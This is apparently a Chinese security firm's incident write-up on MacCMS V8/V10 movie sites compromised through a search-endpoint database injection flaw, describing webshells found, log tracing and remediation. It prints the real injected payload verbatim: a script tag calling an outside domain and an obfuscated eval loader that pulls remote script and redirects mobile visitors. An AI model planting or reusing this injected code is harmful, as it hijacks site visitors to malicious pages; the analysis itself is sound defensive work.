蘋果cms數(shù)據(jù)庫被掛馬該如何解決？ 2020年安全方案

時間：2020-03-13作者：青島四海通達(dá)電子科技有限公司瀏覽：1043

2020年剛開始，蘋果CMS被爆出數(shù)據(jù)庫代碼執(zhí)行漏洞，大量的電影網(wǎng)站被掛馬，尤其電影的頁面被篡改植入了惡意代碼，數(shù)據(jù)庫中的VOD表里的d_name被全部修改，導(dǎo)致網(wǎng)站打開后直接跳轉(zhuǎn)到S站或者彈窗廣告，目前該maccms漏洞受影響的蘋果系統(tǒng)版本是V8,V10，很多客戶網(wǎng)站被反復(fù)篡改，很無奈，通過朋友介紹找到我們SINE安全尋求技術(shù)上支持，防止網(wǎng)站被掛馬。根據(jù)客戶的反應(yīng)，服務(wù)器采用的是linux centos系統(tǒng)，蘋果CMS版本是較新的V10版本，我們立即成立網(wǎng)站安全應(yīng)急響應(yīng)處理，幫助客戶解決網(wǎng)站被攻擊的問題。

首先很多站長以為升級了蘋果CMS官方較新的漏洞補(bǔ)丁就沒問題了，通過我們SINE安全技術(shù)對補(bǔ)丁的代碼安全分析發(fā)現(xiàn)，該漏洞補(bǔ)丁對當(dāng)前的數(shù)據(jù)庫代碼執(zhí)行漏洞是沒有任何效果的，于事無補(bǔ)，網(wǎng)站還會繼續(xù)被攻擊。

我們來看下客戶網(wǎng)站目前發(fā)生的掛馬問題，打開網(wǎng)站首頁以及各個電影地址都會被插入掛馬代碼，如下圖所示：

打包壓縮了一份網(wǎng)站源代碼，以及nginx網(wǎng)站日志文件，我們SINE安全工程師在根目錄下發(fā)現(xiàn)被上傳了網(wǎng)站webshell木馬文件，通過網(wǎng)站日志溯源追蹤我們查看到訪問這個PHP腳本木馬文件的是一個韓國的IP，具體的代碼如下圖：

代碼做了加密處理，我們SINE安全對其解密發(fā)現(xiàn)該代碼的功能可以對網(wǎng)站進(jìn)行上傳，下載，修改代碼，操作數(shù)據(jù)庫等功能，屬于PHP大馬的范疇，也叫webshell木馬文件，我們又對蘋果CMS的源代碼進(jìn)行了人工安全審計，發(fā)現(xiàn)index.php代碼對搜索模塊上做的一些惡意代碼過濾檢查存在漏洞，可導(dǎo)致攻擊者繞過安全過濾，直接將SQL插入代碼執(zhí)行到數(shù)據(jù)庫當(dāng)中去。

我們對數(shù)據(jù)庫進(jìn)行安全檢測發(fā)現(xiàn)，在VOD表的d_name被批量植入了掛馬代碼：

<script src=//www.kilin.xyz/1.js>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<61="3/2" 7="http://0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href="http://:168/ua80666/"',500)}

這手法很專業(yè)，不是一般的攻擊者所為，針對手機(jī)端做了跳轉(zhuǎn)以及隱藏嵌入，讓網(wǎng)站運(yùn)營者根本無法察覺發(fā)現(xiàn)，還判斷了cookies來路，達(dá)到條件才能觸發(fā)攻擊者植入的廣告代碼。繼續(xù)安全分析與追蹤，發(fā)現(xiàn)了攻擊者的手法，POST提交到/index.php?m=vod-search，POST內(nèi)容是加密的這里就不方便發(fā)出了，屬于漏洞攻擊了，可能會給其他使用蘋果CMS系統(tǒng)的網(wǎng)站造成攻擊，我們SINE安全技術(shù)對POST攻擊代碼進(jìn)行了解密分析，發(fā)現(xiàn)確實是繞過了蘋果官方V8，V10系統(tǒng)的代碼安全過濾，直接將掛馬代碼插入到了數(shù)據(jù)庫里了。

問題根源找到了，接下來我們對客戶的蘋果CMS漏洞進(jìn)行修復(fù)，對POST提交過來的參數(shù)進(jìn)行嚴(yán)格的過濾與轉(zhuǎn)義，對vod-search含有的惡意字符進(jìn)行強(qiáng)制轉(zhuǎn)換，對惡意代碼進(jìn)行安全攔截，防止傳入到后端進(jìn)行數(shù)據(jù)庫里的代碼執(zhí)行。對網(wǎng)站代碼里存在的木馬后門進(jìn)行了全面的人工審計與檢查，共計發(fā)現(xiàn)5個后門，其余的在緩存目錄當(dāng)中，跟程序代碼混淆在一起，也都刪除了，對網(wǎng)站的后臺地址進(jìn)行了更改，之前后臺使用的地址被攻擊者掌握，對管理員的賬號密碼進(jìn)行了加強(qiáng)，至此蘋果CMS網(wǎng)站被掛馬的問題才得以徹底解決，如果您的maccms也被一直掛馬，自己懂代碼的話可以對POST到index.php的數(shù)據(jù)進(jìn)行安全攔截與檢查，防止惡意代碼的插入，如果不是太懂的話，建議找專業(yè)的網(wǎng)站安全公司來處理解決。


青島四海通達(dá)電子科技有限公司專注于服務(wù)器安全,網(wǎng)絡(luò)安全公司,網(wǎng)站安全防護(hù),網(wǎng)站漏洞檢測,滲透測試,網(wǎng)站安全,網(wǎng)站漏洞掃描,網(wǎng)站安全檢測等, 歡迎致電 13280888826

• 詞條

  詞條說明

• 服務(wù)器中病毒怎么解決

  春節(jié)假期剛過，正常上班的日子正在進(jìn)入步伐，早上起來的時候發(fā)現(xiàn)騰訊助手發(fā)來了好幾條安全告警通知，檢測到幾個木馬文件，巧了，昨天也收到一個木馬警告，作為一個網(wǎng)絡(luò)小白的我，只是把木馬文件隔離，沒想到今天又中招了，其實我很懵，怎么會有人攻擊我網(wǎng)站服務(wù)器，而且服務(wù)器上我只是部署了幾個自己的站點，所以我的**反應(yīng)是是不是公司里哪個大佬想用我的服務(wù)器練練手，但當(dāng)我打開騰訊云的入侵檢測頁面時，發(fā)現(xiàn)事情并沒有這么簡

• 網(wǎng)站認(rèn)證登錄安全滲透測試檢測要點

  圣誕節(jié)很快就要到了，對滲透測試的熱情仍然有增無減。我們SINE安全在此為用戶認(rèn)證登錄安全制定一個全面的檢測方法和要點Json web token (JWT), 是為了在網(wǎng)絡(luò)應(yīng)用環(huán)境間傳遞聲明而執(zhí)行的一種基于JSON的開放標(biāo)準(zhǔn)（(RFC 7519).該token被設(shè)計為緊湊且安全的，特別適用于分布式站點的單點登錄（SSO）場景。JWT的聲明一般被用來在身份提供者和服務(wù)提供者間傳遞被認(rèn)證的用戶身份信息

• 網(wǎng)站漏洞分析查找原因之攻防實戰(zhàn)

  漏洞分析和滲透測試是網(wǎng)站安全攻擊和防御演習(xí)攻擊者的常用方法。通過收集目標(biāo)系統(tǒng)的信息和綜合分析，使用適當(dāng)?shù)墓艄ぞ邔δ繕?biāo)系統(tǒng)的安全漏洞進(jìn)行相關(guān)分析，驗證漏洞的使用方法和難度，并通過各種攻擊方法找到潛在漏洞的攻擊路徑?；谥贫ǖ墓舴桨?，利用漏洞和攻擊進(jìn)行實際作戰(zhàn)演習(xí)，嘗試各種技術(shù)手段訪問或操作系統(tǒng)、數(shù)據(jù)庫和中間文件，繞過系統(tǒng)安全保護(hù)，全面滲透目標(biāo)系統(tǒng)。通過滲透等方式獲得相關(guān)關(guān)系。統(tǒng)一控制權(quán)限后，為進(jìn)

• 網(wǎng)站安全防護(hù)常用的方法

  以下是一些常用的網(wǎng)站安全防護(hù)方法：較新系統(tǒng)和軟件：定期較新操作系統(tǒng)和應(yīng)用程序，及時修補(bǔ)已知漏洞，提高系統(tǒng)的安全性。安裝*墻和殺毒軟件：安裝*墻和殺毒軟件，以防止軟件和網(wǎng)絡(luò)攻擊。使用SSL證書：使用SSL證書對網(wǎng)站進(jìn)行加密，保護(hù)用戶數(shù)據(jù)的機(jī)密性和完整性。采用安全的密碼策略：采用多因素身份驗證機(jī)制，設(shè)置復(fù)雜且難以猜測的密碼，避免使用默認(rèn)密碼或弱密碼。使用Web應(yīng)用*墻（WAF）：使用WAF檢測和